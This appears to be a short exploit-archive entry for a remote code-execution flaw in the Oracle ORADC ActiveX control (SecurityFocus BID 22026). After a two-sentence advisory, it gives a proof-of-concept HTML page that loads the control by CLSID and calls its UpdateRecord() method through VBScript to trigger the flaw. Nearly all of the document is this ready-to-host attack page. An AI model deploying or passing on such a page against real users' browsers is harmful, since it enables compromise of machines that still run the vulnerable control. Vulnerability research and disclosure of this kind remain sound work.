30 lines
No EOL
692 B
HTML
30 lines
No EOL
692 B
HTML
source: https://www.securityfocus.com/bid/22026/info
|
|
|
|
Oracle ORADC ActiveX control is prone to a remote code-execution vulnerability.
|
|
|
|
Exploiting this issue allows remote attackers to execute arbitrary machine code in the context of applications using the affected ActiveX control and possibly to compromise affected computers.
|
|
|
|
<!--
|
|
// CLSID: {EC4CF635-D196-11CE-9027-02608C4BF3B5}
|
|
// Info: ORADC Control
|
|
// ProgID: ORADC.ORADCCtrl.1
|
|
// InprocServer32: C:\\Oracle\\Ora81\\bin\\oradc.ocx
|
|
--!>
|
|
|
|
<html>
|
|
|
|
<body>
|
|
<OBJECT id="test" WIDTH=445 HEIGHT=40
|
|
classid="clsid:EC4CF635-D196-11CE-9027-02608C4BF3B5" >
|
|
</OBJECT>
|
|
|
|
<script language="vbscript">
|
|
|
|
|
|
test.UpdateRecord()
|
|
|
|
|
|
</script>
|
|
|
|
</body>
|
|
</html> |